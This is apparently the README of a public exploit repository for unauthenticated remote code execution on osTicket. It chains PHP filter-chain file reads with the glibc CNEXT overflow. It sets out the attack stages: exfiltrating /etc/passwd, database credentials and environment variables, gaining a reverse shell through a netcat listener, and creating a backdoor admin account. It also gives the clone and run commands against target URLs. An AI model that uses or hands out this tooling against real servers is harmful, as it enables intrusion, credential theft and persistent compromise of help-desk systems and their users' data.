Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.
Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.
This repository contains a proof-of-concept exploit for CVE-2026-22200, a critical vulnerability affecting osTicket versions β€ 1.18.2. The exploit chains two powerful techniques:
The result: Unauthenticated Remote Code Execution on vulnerable osTicket servers.
CVSS Score: 9.8 (Critical)
osTicket's mPDF integration allows unauthenticated users to inject malicious PHP filter chains through specially crafted HTML payloads in support tickets. This enables:
Root Cause: Insufficient validation of image URLs in user-supplied HTML before passing to mPDF.
CVSS Score: 9.8 (Critical)
Buffer overflow in glibc's iconv() when processing the ISO-2022-CN-EXT character set. Combined with PHP filter chains, this allows:
Vulnerable glibc versions: < 2.39 (February 2024)
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 1. RECONNAISSANCE β
β ββ Detect osTicket, identify rich-text topics β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 2. AUTHENTICATION β
β ββ Self-register OR use existing credentials β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 3. FILE EXFILTRATION (PHP Filter Chains) β
β ββ /etc/passwd β
β ββ include/ost-config.php (DB credentials, SECRET_SALT) β
β ββ /proc/self/maps (memory layout) β
β ββ /proc/self/environ (environment variables) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 4. LIBC FINGERPRINTING β
β ββ Extract partial libc via filter chains β
β ββ Extract GNU Build ID β
β ββ Download full libc from libc.rip β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 5. CNEXT RCE EXPLOITATION β
β ββ Generate heap corruption payload β
β ββ Inject via ticket reply (with filter execution fixes) β
β ββ Trigger via PDF export (server crashes) β
β ββ Execute reverse shell β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 6. POST-EXPLOITATION β
β ββ Interactive reverse shell β
β ββ Database access (using exfiltrated DBPASS) β
β ββ Create backdoor admin account β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
# Clone the repository
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE
# Install required packages
pip install -r requirements.txt
requirements.txt:
requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# OR
venv\Scripts\activate # Windows
pip install -r requirements.txt
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Run exploit
python3 osticket_revshell.py https://target.com/osticket \
--lhost YOUR_IP \
--lport 4444
python3 osticket_exploit.py https://target.com/osticket
# Use proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
--lhost 10.0.0.5 \
--lport 4444 \
--proxy http://127.0.0.1:8080
# Force specific help-topic ID
python3 osticket_exploit.py https://target.com/osticket \
--topic-id 2
# Disable colored output (for logging)
python3 osticket_exploit.py https://target.com/osticket --no-color
If registration is disabled, you'll be prompted for credentials:
python3 osticket_exploit.py https://target.com/osticket
[?] Enter email for new account (or existing): [email protected]
[?] Enter password: ********
The exploit uses a sophisticated filter chain to prepend a BMP header to arbitrary files, bypassing mPDF's file type restrictions: